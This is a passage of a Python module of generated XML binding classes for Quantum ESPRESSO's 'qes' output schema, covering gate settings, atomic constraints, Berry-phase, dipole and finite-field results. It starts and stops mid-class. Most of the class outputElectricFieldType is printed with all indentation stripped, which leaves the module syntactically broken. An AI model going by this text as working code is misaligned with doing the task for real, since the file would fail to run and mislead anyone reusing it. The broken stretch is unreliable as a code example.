            fval_ = self.gds_validate_float(fval_, node, 'zgate')
            self.zgate = fval_
        elif nodeName_ == 'relaxz':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'relaxz')
            self.relaxz = ival_
        elif nodeName_ == 'block':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'block')
            self.block = ival_
        elif nodeName_ == 'block_1' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'block_1')
            self.block_1 = fval_
        elif nodeName_ == 'block_2' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'block_2')
            self.block_2 = fval_
        elif nodeName_ == 'block_height' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'block_height')
            self.block_height = fval_
# end class gate_settingsType
class atomic_constraintsType(GeneratedsSuper):
    """Generated binding for the qes ``atomic_constraintsType`` XML complex type.

    Container for a list of ``atomic_constraint`` child elements plus the
    constraint count and convergence tolerance.
    """
    subclass = None
    superclass = None
    def __init__(self, num_of_constraints=None, tolerance=None, atomic_constraint=None):
        self.original_tagname_ = None
        self.num_of_constraints = num_of_constraints
        self.tolerance = tolerance
        # Fresh list per instance; never share a mutable default.
        if atomic_constraint is None:
            self.atomic_constraint = []
        else:
            self.atomic_constraint = atomic_constraint
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered via CurrentSubclassModule_, then the
        # class-level `subclass` hook, then this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, atomic_constraintsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if atomic_constraintsType.subclass:
            return atomic_constraintsType.subclass(*args_, **kwargs_)
        else:
            return atomic_constraintsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessors, including list helpers for the repeated child.
    def get_num_of_constraints(self): return self.num_of_constraints
    def set_num_of_constraints(self, num_of_constraints): self.num_of_constraints = num_of_constraints
    def get_tolerance(self): return self.tolerance
    def set_tolerance(self, tolerance): self.tolerance = tolerance
    def get_atomic_constraint(self): return self.atomic_constraint
    def set_atomic_constraint(self, atomic_constraint): self.atomic_constraint = atomic_constraint
    def add_atomic_constraint(self, value): self.atomic_constraint.append(value)
    def insert_atomic_constraint_at(self, index, value): self.atomic_constraint.insert(index, value)
    def replace_atomic_constraint_at(self, index, value): self.atomic_constraint[index] = value
    def hasContent_(self):
        """Return True when at least one child element would be exported."""
        if (
            self.num_of_constraints is not None or
            self.tolerance is not None or
            self.atomic_constraint
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_constraintsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (tag, attributes, children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomic_constraintsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            # Re-export under the tag name the element was parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_constraintsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_constraintsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_constraintsType'):
        # No XML attributes declared for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_constraintsType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order; None members are skipped."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.num_of_constraints is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:num_of_constraints>%s</qes:num_of_constraints>%s' % (self.gds_format_integer(self.num_of_constraints, input_name='num_of_constraints'), eol_))
        if self.tolerance is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:tolerance>%s</qes:tolerance>%s' % (self.gds_format_double(self.tolerance, input_name='tolerance'), eol_))
        for atomic_constraint_ in self.atomic_constraint:
            atomic_constraint_.export(outfile, level, namespaceprefix_, name_='atomic_constraint', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes declared for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one child element into the matching typed member."""
        if nodeName_ == 'num_of_constraints' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'num_of_constraints')
            self.num_of_constraints = ival_
        elif nodeName_ == 'tolerance' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'tolerance')
            self.tolerance = fval_
        elif nodeName_ == 'atomic_constraint':
            obj_ = atomic_constraintType.factory()
            obj_.build(child_)
            self.atomic_constraint.append(obj_)
            obj_.original_tagname_ = 'atomic_constraint'
# end class atomic_constraintsType
class atomic_constraintType(GeneratedsSuper):
    """Generated binding for the qes ``atomic_constraintType`` XML complex type.

    One structural constraint: four numeric parameters (``constr_parms``),
    the constraint kind (``constr_type``, restricted to a fixed enumeration)
    and the target value (``constr_target``).
    """
    subclass = None
    superclass = None
    def __init__(self, constr_parms=None, constr_type=None, constr_target=None):
        self.original_tagname_ = None
        self.constr_parms = constr_parms
        self.validate_constr_parms_listType(self.constr_parms)
        self.constr_type = constr_type
        self.validate_constr_typeType(self.constr_type)
        self.constr_target = constr_target
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered via CurrentSubclassModule_, then the
        # class-level `subclass` hook, then this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, atomic_constraintType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if atomic_constraintType.subclass:
            return atomic_constraintType.subclass(*args_, **kwargs_)
        else:
            return atomic_constraintType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor pairs (getter/setter per member).
    def get_constr_parms(self): return self.constr_parms
    def set_constr_parms(self, constr_parms): self.constr_parms = constr_parms
    def get_constr_type(self): return self.constr_type
    def set_constr_type(self, constr_type): self.constr_type = constr_type
    def get_constr_target(self): return self.constr_target
    def set_constr_target(self, constr_target): self.constr_target = constr_target
    def validate_constr_parms_listType(self, value):
        """Validate type constr_parms_listType, a list of exactly 4 doubles.

        BUGFIX: the generated check used ``len(str(value)) != 4``, which
        measures the length of the *string representation* instead of the
        number of components, so every valid 4-component value triggered a
        spurious warning.  Count components instead, accepting either the
        raw whitespace-separated text or an already-built sequence.
        """
        if value is not None and Validate_simpletypes_:
            if isinstance(value, str):
                length_ = len(value.split())
            else:
                length_ = len(value)
            if length_ != 4:
                warnings_.warn('Value "%(value)s" does not match xsd length restriction on constr_parms_listType' % {"value" : value} )
    def validate_constr_typeType(self, value):
        # Validate type constr_typeType, a restriction on string.
        if value is not None and Validate_simpletypes_:
            value = str(value)
            enumerations = ['type_coord', 'atom_coord', 'distance', 'planar_angle', 'torsional_angle', 'bennet_proj']
            enumeration_respectee = False
            for enum in enumerations:
                if value == enum:
                    enumeration_respectee = True
                    break
            if not enumeration_respectee:
                warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on constr_typeType' % {"value" : value.encode("utf-8")} )
    def hasContent_(self):
        """Return True when at least one child element would be exported."""
        if (
            self.constr_parms is not None or
            self.constr_type is not None or
            self.constr_target is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_constraintType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (tag, attributes, children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomic_constraintType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            # Re-export under the tag name the element was parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_constraintType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_constraintType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_constraintType'):
        # No XML attributes declared for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_constraintType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order; None members are skipped."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.constr_parms is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:constr_parms>%s</qes:constr_parms>%s' % (self.gds_format_double_list(self.constr_parms, input_name='constr_parms'), eol_))
        if self.constr_type is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:constr_type>%s</qes:constr_type>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.constr_type), input_name='constr_type')), eol_))
        if self.constr_target is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:constr_target>%s</qes:constr_target>%s' % (self.gds_format_double(self.constr_target, input_name='constr_target'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes declared for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one child element into the matching typed member."""
        if nodeName_ == 'constr_parms':
            constr_parms_ = child_.text
            constr_parms_ = self.gds_validate_double_list(constr_parms_, node, 'constr_parms')
            self.constr_parms = constr_parms_
            # validate type constr_parms_listType
            self.validate_constr_parms_listType(self.constr_parms)
        elif nodeName_ == 'constr_type':
            constr_type_ = child_.text
            constr_type_ = self.gds_validate_string(constr_type_, node, 'constr_type')
            self.constr_type = constr_type_
            # validate type constr_typeType
            self.validate_constr_typeType(self.constr_type)
        elif nodeName_ == 'constr_target' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'constr_target')
            self.constr_target = fval_
# end class atomic_constraintType
class outputElectricFieldType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, BerryPhase=None, finiteElectricFieldInfo=None, dipoleInfo=None, gateInfo=None):
self.original_tagname_ = None
self.BerryPhase = BerryPhase
self.finiteElectricFieldInfo = finiteElectricFieldInfo
self.dipoleInfo = dipoleInfo
self.gateInfo = gateInfo
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, outputElectricFieldType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if outputElectricFieldType.subclass:
return outputElectricFieldType.subclass(*args_, **kwargs_)
else:
return outputElectricFieldType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_BerryPhase(self): return self.BerryPhase
def set_BerryPhase(self, BerryPhase): self.BerryPhase = BerryPhase
def get_finiteElectricFieldInfo(self): return self.finiteElectricFieldInfo
def set_finiteElectricFieldInfo(self, finiteElectricFieldInfo): self.finiteElectricFieldInfo = finiteElectricFieldInfo
def get_dipoleInfo(self): return self.dipoleInfo
def set_dipoleInfo(self, dipoleInfo): self.dipoleInfo = dipoleInfo
def get_gateInfo(self): return self.gateInfo
def set_gateInfo(self, gateInfo): self.gateInfo = gateInfo
def hasContent_(self):
if (
self.BerryPhase is not None or
self.finiteElectricFieldInfo is not None or
self.dipoleInfo is not None or
self.gateInfo is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='outputElectricFieldType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('outputElectricFieldType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='outputElectricFieldType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='outputElectricFieldType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='outputElectricFieldType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='outputElectricFieldType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.BerryPhase is not None:
self.BerryPhase.export(outfile, level, namespaceprefix_, name_='BerryPhase', pretty_print=pretty_print)
if self.finiteElectricFieldInfo is not None:
self.finiteElectricFieldInfo.export(outfile, level, namespaceprefix_, name_='finiteElectricFieldInfo', pretty_print=pretty_print)
if self.dipoleInfo is not None:
self.dipoleInfo.export(outfile, level, namespaceprefix_, name_='dipoleInfo', pretty_print=pretty_print)
if self.gateInfo is not None:
self.gateInfo.export(outfile, level, namespaceprefix_, name_='gateInfo', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one child element by its local tag name to the matching
        binding class, build it recursively, and attach it to self."""
        if nodeName_ == 'BerryPhase':
            obj_ = BerryPhaseOutputType.factory()
            obj_.build(child_)
            self.BerryPhase = obj_
            obj_.original_tagname_ = 'BerryPhase'
        elif nodeName_ == 'finiteElectricFieldInfo':
            obj_ = finiteFieldOutType.factory()
            obj_.build(child_)
            self.finiteElectricFieldInfo = obj_
            obj_.original_tagname_ = 'finiteElectricFieldInfo'
        elif nodeName_ == 'dipoleInfo':
            obj_ = dipoleOutputType.factory()
            obj_.build(child_)
            self.dipoleInfo = obj_
            obj_.original_tagname_ = 'dipoleInfo'
        elif nodeName_ == 'gateInfo':
            obj_ = gateInfoType.factory()
            obj_.build(child_)
            self.gateInfo = obj_
            obj_.original_tagname_ = 'gateInfo'
# end class outputElectricFieldType
class BerryPhaseOutputType(GeneratedsSuper):
    """XML binding for the ``BerryPhaseOutputType`` complex type.

    Holds Berry-phase polarization results: a single totalPolarization and
    totalPhase child plus repeating ionicPolarization and
    electronicPolarization children.  Code follows the generateDS-style
    conventions used throughout this module (factory/export/build protocol).
    """
    subclass = None
    superclass = None
    def __init__(self, totalPolarization=None, totalPhase=None, ionicPolarization=None, electronicPolarization=None):
        self.original_tagname_ = None
        self.totalPolarization = totalPolarization
        self.totalPhase = totalPhase
        # Repeating elements get a fresh list per instance (never a shared
        # mutable default).
        if ionicPolarization is None:
            self.ionicPolarization = []
        else:
            self.ionicPolarization = ionicPolarization
        if electronicPolarization is None:
            self.electronicPolarization = []
        else:
            self.electronicPolarization = electronicPolarization
    def factory(*args_, **kwargs_):
        # Prefer a registered subclass (from an active subclass module) over
        # this base class when instantiating.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, BerryPhaseOutputType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if BerryPhaseOutputType.subclass:
            return BerryPhaseOutputType.subclass(*args_, **kwargs_)
        else:
            return BerryPhaseOutputType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain get_/set_ (and list add/insert/replace) accessors, generated style.
    def get_totalPolarization(self): return self.totalPolarization
    def set_totalPolarization(self, totalPolarization): self.totalPolarization = totalPolarization
    def get_totalPhase(self): return self.totalPhase
    def set_totalPhase(self, totalPhase): self.totalPhase = totalPhase
    def get_ionicPolarization(self): return self.ionicPolarization
    def set_ionicPolarization(self, ionicPolarization): self.ionicPolarization = ionicPolarization
    def add_ionicPolarization(self, value): self.ionicPolarization.append(value)
    def insert_ionicPolarization_at(self, index, value): self.ionicPolarization.insert(index, value)
    def replace_ionicPolarization_at(self, index, value): self.ionicPolarization[index] = value
    def get_electronicPolarization(self): return self.electronicPolarization
    def set_electronicPolarization(self, electronicPolarization): self.electronicPolarization = electronicPolarization
    def add_electronicPolarization(self, value): self.electronicPolarization.append(value)
    def insert_electronicPolarization_at(self, index, value): self.electronicPolarization.insert(index, value)
    def replace_electronicPolarization_at(self, index, value): self.electronicPolarization[index] = value
    def hasContent_(self):
        # True when any child element is present; decides between an empty
        # ('<tag/>') and a full element in export().
        if (
            self.totalPolarization is not None or
            self.totalPhase is not None or
            self.ionicPolarization or
            self.electronicPolarization
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='BerryPhaseOutputType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as an XML element (tag, attributes, children)."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('BerryPhaseOutputType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Use the tag name this object was originally parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='BerryPhaseOutputType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='BerryPhaseOutputType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='BerryPhaseOutputType'):
        # No XML attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='BerryPhaseOutputType', fromsubclass_=False, pretty_print=True):
        """Serialize children in schema order; repeated children in list order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.totalPolarization is not None:
            self.totalPolarization.export(outfile, level, namespaceprefix_, name_='totalPolarization', pretty_print=pretty_print)
        if self.totalPhase is not None:
            self.totalPhase.export(outfile, level, namespaceprefix_, name_='totalPhase', pretty_print=pretty_print)
        for ionicPolarization_ in self.ionicPolarization:
            ionicPolarization_.export(outfile, level, namespaceprefix_, name_='ionicPolarization', pretty_print=pretty_print)
        for electronicPolarization_ in self.electronicPolarization:
            electronicPolarization_.export(outfile, level, namespaceprefix_, name_='electronicPolarization', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree-style *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build one child by local tag name; repeating children are appended."""
        if nodeName_ == 'totalPolarization':
            obj_ = polarizationType.factory()
            obj_.build(child_)
            self.totalPolarization = obj_
            obj_.original_tagname_ = 'totalPolarization'
        elif nodeName_ == 'totalPhase':
            obj_ = phaseType.factory()
            obj_.build(child_)
            self.totalPhase = obj_
            obj_.original_tagname_ = 'totalPhase'
        elif nodeName_ == 'ionicPolarization':
            obj_ = ionicPolarizationType.factory()
            obj_.build(child_)
            self.ionicPolarization.append(obj_)
            obj_.original_tagname_ = 'ionicPolarization'
        elif nodeName_ == 'electronicPolarization':
            obj_ = electronicPolarizationType.factory()
            obj_.build(child_)
            self.electronicPolarization.append(obj_)
            obj_.original_tagname_ = 'electronicPolarization'
# end class BerryPhaseOutputType
class dipoleOutputType(GeneratedsSuper):
    """XML binding for the ``dipoleOutputType`` complex type.

    Holds dipole-correction output: an integer ``idir`` (direction index,
    parsed as a positiveInteger) plus six scalar-quantity children
    (dipole, ion_dipole, elec_dipole, dipoleField, potentialAmp,
    totalLength).  Generated-style class (factory/export/build protocol).
    """
    subclass = None
    superclass = None
    def __init__(self, idir=None, dipole=None, ion_dipole=None, elec_dipole=None, dipoleField=None, potentialAmp=None, totalLength=None):
        self.original_tagname_ = None
        self.idir = idir
        self.dipole = dipole
        self.ion_dipole = ion_dipole
        self.elec_dipole = elec_dipole
        self.dipoleField = dipoleField
        self.potentialAmp = potentialAmp
        self.totalLength = totalLength
    def factory(*args_, **kwargs_):
        # Prefer a registered subclass (from an active subclass module) over
        # this base class when instantiating.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, dipoleOutputType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if dipoleOutputType.subclass:
            return dipoleOutputType.subclass(*args_, **kwargs_)
        else:
            return dipoleOutputType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain get_/set_ accessor pairs, generated style.
    def get_idir(self): return self.idir
    def set_idir(self, idir): self.idir = idir
    def get_dipole(self): return self.dipole
    def set_dipole(self, dipole): self.dipole = dipole
    def get_ion_dipole(self): return self.ion_dipole
    def set_ion_dipole(self, ion_dipole): self.ion_dipole = ion_dipole
    def get_elec_dipole(self): return self.elec_dipole
    def set_elec_dipole(self, elec_dipole): self.elec_dipole = elec_dipole
    def get_dipoleField(self): return self.dipoleField
    def set_dipoleField(self, dipoleField): self.dipoleField = dipoleField
    def get_potentialAmp(self): return self.potentialAmp
    def set_potentialAmp(self, potentialAmp): self.potentialAmp = potentialAmp
    def get_totalLength(self): return self.totalLength
    def set_totalLength(self, totalLength): self.totalLength = totalLength
    def hasContent_(self):
        # True when any child element is present; decides between an empty
        # ('<tag/>') and a full element in export().
        if (
            self.idir is not None or
            self.dipole is not None or
            self.ion_dipole is not None or
            self.elec_dipole is not None or
            self.dipoleField is not None or
            self.potentialAmp is not None or
            self.totalLength is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='dipoleOutputType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as an XML element (tag, attributes, children)."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('dipoleOutputType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Use the tag name this object was originally parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='dipoleOutputType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='dipoleOutputType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='dipoleOutputType'):
        # No XML attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='dipoleOutputType', fromsubclass_=False, pretty_print=True):
        """Serialize children in schema order.  idir is written inline as an
        integer; the other children export themselves."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.idir is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:idir>%s</qes:idir>%s' % (self.gds_format_integer(self.idir, input_name='idir'), eol_))
        if self.dipole is not None:
            self.dipole.export(outfile, level, namespaceprefix_, name_='dipole', pretty_print=pretty_print)
        if self.ion_dipole is not None:
            self.ion_dipole.export(outfile, level, namespaceprefix_, name_='ion_dipole', pretty_print=pretty_print)
        if self.elec_dipole is not None:
            self.elec_dipole.export(outfile, level, namespaceprefix_, name_='elec_dipole', pretty_print=pretty_print)
        if self.dipoleField is not None:
            self.dipoleField.export(outfile, level, namespaceprefix_, name_='dipoleField', pretty_print=pretty_print)
        if self.potentialAmp is not None:
            self.potentialAmp.export(outfile, level, namespaceprefix_, name_='potentialAmp', pretty_print=pretty_print)
        if self.totalLength is not None:
            self.totalLength.export(outfile, level, namespaceprefix_, name_='totalLength', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree-style *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build one child by local tag name.  idir must parse as a
        positiveInteger (> 0); the rest are scalarQuantityType children."""
        if nodeName_ == 'idir' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'idir')
            self.idir = ival_
        elif nodeName_ == 'dipole':
            obj_ = scalarQuantityType.factory()
            obj_.build(child_)
            self.dipole = obj_
            obj_.original_tagname_ = 'dipole'
        elif nodeName_ == 'ion_dipole':
            obj_ = scalarQuantityType.factory()
            obj_.build(child_)
            self.ion_dipole = obj_
            obj_.original_tagname_ = 'ion_dipole'
        elif nodeName_ == 'elec_dipole':
            obj_ = scalarQuantityType.factory()
            obj_.build(child_)
            self.elec_dipole = obj_
            obj_.original_tagname_ = 'elec_dipole'
        elif nodeName_ == 'dipoleField':
            obj_ = scalarQuantityType.factory()
            obj_.build(child_)
            self.dipoleField = obj_
            obj_.original_tagname_ = 'dipoleField'
        elif nodeName_ == 'potentialAmp':
            obj_ = scalarQuantityType.factory()
            obj_.build(child_)
            self.potentialAmp = obj_
            obj_.original_tagname_ = 'potentialAmp'
        elif nodeName_ == 'totalLength':
            obj_ = scalarQuantityType.factory()
            obj_.build(child_)
            self.totalLength = obj_
            obj_.original_tagname_ = 'totalLength'
# end class dipoleOutputType
class finiteFieldOutType(GeneratedsSuper):
    """XML binding for ``finiteFieldOutType``: the electronic and ionic
    dipole values of a finite-electric-field calculation.

    Both children are d3vectorType values -- exactly three doubles,
    serialized as a whitespace-separated list via gds_format_double_list.
    Generated-style class (factory/export/build protocol).
    """
    subclass = None
    superclass = None
    def __init__(self, electronicDipole=None, ionicDipole=None):
        self.original_tagname_ = None
        self.electronicDipole = electronicDipole
        self.validate_d3vectorType(self.electronicDipole)
        self.ionicDipole = ionicDipole
        self.validate_d3vectorType(self.ionicDipole)
    def factory(*args_, **kwargs_):
        # Prefer a registered subclass (from an active subclass module) over
        # this base class when instantiating.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, finiteFieldOutType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if finiteFieldOutType.subclass:
            return finiteFieldOutType.subclass(*args_, **kwargs_)
        else:
            return finiteFieldOutType(*args_, **kwargs_)
